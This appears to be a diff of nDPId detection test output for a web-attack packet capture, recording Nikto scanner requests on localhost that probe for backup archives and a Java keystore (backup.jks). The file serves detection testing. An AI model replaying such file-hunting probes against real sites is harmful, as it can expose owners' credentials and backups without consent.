{"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1576420277001,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277001,"pkt":"AAAAAAAAAAAAAAAACABFAADAM9pAAEAGCFx\/AAABfwAAAcMyH5CilAu7EPfGmYAYAED+tAAAAQEICp1m\/DGdZvwxR0VUIC8xMjcwLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1576420277002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277002,"pkt":"AAAAAAAAAAAAAAAACABFAADAUGZAAEAG689\/AAABfwAAAcM0H5Crr2gHBF6lfIAYAED+tAAAAQEICp1m\/DKdZvwyR0VUIC8xMjcwLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1576420277004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277004,"pkt":"AAAAAAAAAAAAAAAACABFAADBfrVAAEAGvX9\/AAABfwAAAcM2H5AiEUbRArZM2IAYAED+tQAAAQEICp1m\/DSdZvw0R0VUIC8xMjcuMC5hbHogSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1576420277006,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277006,"pkt":"AAAAAAAAAAAAAAAACABFAADBggJAAEAGujJ\/AAABfwAAAcM4H5AaCbpkhn3rTYAYAED+tQAAAQEICp1m\/DadZvw1R0VUIC8xMjcuMC5hbHogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1576420277007,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277007,"pkt":"AAAAAAAAAAAAAAAACABFAADC7TtAAEAGTvh\/AAABfwAAAcM6H5D6jdVeqyQPZoAYAED+tgAAAQEICp1m\/DedZvw3R0VUIC9iYWNrdXAuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1576420277010,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277010,"pkt":"AAAAAAAAAAAAAAAACABFAADChG5AAEAGt8V\/AAABfwAAAcM8H5BcKrwJSZEDE4AYAED+tgAAAQEICp1m\/DqdZvw6R0VUIC9iYWNrdXAuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1576420277011,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277011,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/sClAAEAGjA1\/AAABfwAAAcM+H5BuqIhDc4THFIAYAED+swAAAQEICp1m\/DudZvw7R0VUIC8xMjcuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1576420277013,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277013,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/xzVAAEAGdQF\/AAABfwAAAcNAH5BZGv9XO\/ACDYAYAED+swAAAQEICp1m\/D2dZvw9R0VUIC8xMjcuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
